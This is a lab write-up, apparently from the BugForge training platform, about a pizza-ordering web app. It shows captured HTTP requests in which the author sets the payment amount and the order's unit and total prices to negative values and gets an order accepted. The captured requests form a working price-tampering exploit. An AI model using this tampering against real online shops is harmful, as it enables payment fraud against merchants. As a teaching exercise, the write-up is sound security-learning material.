Can you order things for less than the intended price?
Once you get the lab up and running - go ahead and register an account. After logging in you'll land on the home page. Since we kind of know that this has something to do with the price of the item that we are ordering we can go through the steps to create and fully purchase an order. In either Caido or Burpsuite make sure that you are capturing the requests, one of the first requests that I looked at was.
POST /api/payment/process HTTP/1.1
Host: lab-1771876487783-vpjyzg.labs-app.bugforge.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6NCwidXNlcm5hbWUiOiJ0ZXN0IiwiaWF0IjoxNzcxODc2NTY0fQ.ST2EYFjPyhPzooKosYOh6HpAMOiYXou9DlSQ29r-Ezg
Content-Length: 52
Origin: https://lab-1771876487783-vpjyzg.labs-app.bugforge.io
Connection: keep-alive
Referer: https://lab-1771876487783-vpjyzg.labs-app.bugforge.io/checkout
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"card_number":"4444 4444 4444 4444","amount":10.99}
The response for the above request was.
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Content-Length: 96
Content-Type: application/json; charset=utf-8
Date: Mon, 23 Feb 2026 19:56:27 GMT
Etag: W/"60-/nooK0IT6pC4APjJdQLtSba2j/Q"
X-Powered-By: Express
{
"success": true,
"transaction_id": "TXN-1771876587069",
"message": "Payment processed successfully"
}
I fed that request into Caido's replay feature and changed the "amount" from 10.99 to -10.99. Just to see if I end up getting a new transaction_id, and funny enough we do.
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Content-Length: 96
Content-Type: application/json; charset=utf-8
Date: Mon, 23 Feb 2026 19:56:41 GMT
Etag: W/"60-bzN46vEeVOe7UvCzDNFi8vZue/A"
X-Powered-By: Express
Connection: close
{
"success": true,
"transaction_id": "TXN-1771876601959",
"message": "Payment processed successfully"
}
What I didn't get however was a different order number and when I navigated to /orders the first order I created was still purchased for 10.99. The next request however was /api/orders and it was a POST request. I repeated the same steps from above and changed both the unit_price and total_price from a positive number to a negative number.
POST /api/orders HTTP/1.1
Host: lab-1771876487783-vpjyzg.labs-app.bugforge.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/json
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6NCwidXNlcm5hbWUiOiJ0ZXN0IiwiaWF0IjoxNzcxODc2NTY0fQ.ST2EYFjPyhPzooKosYOh6HpAMOiYXou9DlSQ29r-Ezg
Content-Length: 327
Origin: https://lab-1771876487783-vpjyzg.labs-app.bugforge.io
Connection: keep-alive
Referer: https://lab-1771876487783-vpjyzg.labs-app.bugforge.io/checkout
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"items":[{"pizza_name":"Classic Margherita","base_name":"Thin Crust","sauce_name":"Classic Tomato","size":"Medium","toppings":["Tomatoes","Extra Mozzarella"],"quantity":1,"unit_price":-10.99,"total_price":-10.99,"id":1771876573487}],"delivery_address":"1234 test ave","phone":"(111) 111-1111","payment_method":"card","notes":""}
I ended up getting a good response and an entirely different order number from my first order.
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Content-Length: 112
Content-Type: application/json; charset=utf-8
Date: Mon, 23 Feb 2026 19:57:30 GMT
Etag: W/"70-dDZWuoqlDA9j58APv8E2mocW8Bs"
X-Powered-By: Express
Connection: close
{
"id": 2,
"order_number": "CDI-1771876650504-1L5UZG7QB",
"message": "Order created successfully",
"status": "received"
}
Navigating to /orders we can see we now have 2 orders....nice!
No AI used in the making of this post that I know of atleast 😀